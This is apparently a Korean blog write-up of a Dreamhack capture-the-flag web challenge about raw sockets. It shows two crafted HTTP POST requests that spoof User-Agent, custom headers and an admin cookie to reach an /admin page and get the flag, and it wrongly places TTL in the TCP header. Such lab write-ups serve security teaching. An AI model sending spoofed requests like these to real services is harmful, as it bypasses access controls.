728x90
Raw Socket Sender은 세부적인 조작이 가능하고 IP 데이터그램이나 ICMP, IGMP 패킷을 읽고 쓰는 것이 가능하다
프로토콜의 헤더를 응용 프로그램에서 직접 만들거나 조작할 수 있어 신규 프로토콜을 설계할 때에도 유용하게 쓰인다.
ex) TTL은 TCP 헤더에 있는 값으로써 애플리케이션 계층에서는 수정할 수가 없지만 Raw 소켓을 사용하면 수정이 가능하다.
IP와 Port를 지정해서 data를 보내는거같다.
소스 코드를 분석해 보면 클라이언트가 127.0.0.1의 IP인지 확인을 하고 User-Agent헤더 값이 Admin Browser 인지 확인을 한다. 이렇게 하나씩 지정된 헤더의 값에 들어있는지 확인을 한다.
작성한 페이로드는 밑에 있다.
| POST /admin HTTP/1.1 Host: host1.dreamhack.games/20053 User-Agent:Admin Browser DreamhackUser:admin Cookie:admin=true userid=admin |
위의 페이로드를 실행시켰을 때, Admin id 값이 응답 값으로 오는 걸 확인할 수 있다.
즉, Admin id가 온다는 거는 userid가 admin이 아니라는 거다.
페이로드는 다음과 같다. POST 패킷을 전송하려면 Content-Length 헤더와 Content-Type 헤더가 필요하다.
| POST /admin HTTP/1.1 Host: host1.dreamhack.games/20053 Content-Length: 12 Content-Type: application/x-www-form-urlencoded User-Agent:Admin Browser DreamhackUser:admin Cookie:admin=true userid=admin |
위에서 작성한 페이로드를 보내면 응답값으로 flag값이 오는 걸 확인할 수 있다.
'모의해킹 > Dreamhack' 카테고리의 다른 글
| simple-ssti [WEB LEVEL1] (0) | 2023.04.06 |
|---|---|
| php-1 [WEB LEVEL1] (0) | 2023.04.05 |
| web-ssrf [WEB LEVEL1] (0) | 2023.04.03 |
| Mango [WEB LEVEL1] (0) | 2023.03.31 |
| path traversal [WEB LEVEL1] (0) | 2023.03.31 |
